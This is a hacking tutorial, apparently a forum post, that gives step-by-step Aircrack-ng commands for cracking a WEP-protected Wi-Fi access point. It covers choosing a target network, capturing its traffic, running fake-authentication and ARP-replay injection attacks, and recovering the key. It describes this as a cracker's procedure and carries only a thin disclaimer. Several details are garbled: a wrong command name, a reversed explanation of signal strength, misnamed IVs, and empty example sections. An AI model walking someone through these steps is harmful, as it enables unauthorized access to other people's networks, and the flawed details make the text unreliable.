Linux CMD experience
Backtrack 4 R2 or Ubuntu 7.10 + patched WiFi Drivers + Aircrack-ng suite
common sense
The information in this tutorial is for educational and informational purposes only, use it at your own risk. Soldierx.com, it's members, crew, and affiliates cannot be held responsible for the misuse of this information.
WEP encryption has been hailed as one of the least secure methods of securing a wireless access point in the history of WiFi since wireless encryption standards began being developed. The main reason for this is that fragments of the key are sent between a client computer and the access point in 32bit initialization vectors commonly referred to as ICV's. Statistically it has been shown that a certain volume of these have weak encryption and are vulnerable to packet analysis. The number of packets required to crack an access point's key can vary from 200 to 500 thousand for 64 and 128 bit encryption respectively.
***NOTE***
**This Tutorial will cover a basic WEP crack
**It is by no means exhaustive and is meant for
**A jumping off point, from here I send you to Google
**The place where I first got my information.
**********
***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BING RUN FROM THE root ACCOUNT ON THE MACHINE, IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM YOU NEED TO LOG IN AS ROOT OR sudo
EACH COMMAND***
The first step in any cracker's attempt at a WiFi access point is to pick a target. This can be achieved by running airmon-ng
to list any and all available network adapters.
Then you want to type airodump-ng start
(adapter name: ath0, wlan0, wlan1, etc) What this does is put you wireless adapter into promiscuous or monitor mode which allows it to accept all traffic and basically grab ARP packets and such from out of the air, it also allows tha adapter to do what is called packet injection, basically shooting packets into the network to get a response from the Access point. The next command to run is airodump-ng
(adapter name: mon0, mon1, eth0, etc.) this will list all available access points and let you choose one. you will want to pick one with the best signal. The way to check what the best signal is is to look at the pwr column while the program is running. a strong signal will be a low number preceded by a dash (-) such as -56 or -86. The First example would be the stronger one as I believe the strength is measured in -dBm or the power ratio in decibels (dB) of the measured power referenced to one milliwatt. the lower number being stronger as you get more towards a positive output of power.
Once you have selected your target, make note of the BSSID, Channel, and the amount of data it recieves. Another good indicator of a good accesspoint to crack would be a reasonable amount of data recieved (80-120 without injection, can be more). You would then run the command airodump-ng -w filename --channel (channel of target) --bssid (bssid or MAC address of target) (interface to capture on, mon0, eth0, whatever airmon gives you as the monitor mode interface typically mon0)
Example:
At this stage you would then open a tab in your console window for a separate session and run aireplay-ng -1 0 -a (bssid of target) (interface)
this is a fake authentication attack and will give you something like this:
aireplay-ng -3 -b (bssid of target) (interface)
. This command starts an ARP request replay attack which will stimulate the gathering of data that you need to crack the access point with.
Example:
You Should see this:
open another console window, a third one, and enter aircrack-ng filename.cap
and aricrack will attempt a crack with what you have captured, and if it does not succeed it will monitor the amount of data you have recieved and continue trying to crack the key at regular intervals. once the crack has succeeded you will know it by a screen that has this:
this screen will let you know that you have successfully cracked the key and you can copy it down to use or test. you cn backup the .cap files to a flash drive and crack at a later date if you lose the key. though if the access point's key changes you may have to crack it again.
This is all that is really needed to know to crack a WEP encrypted access point.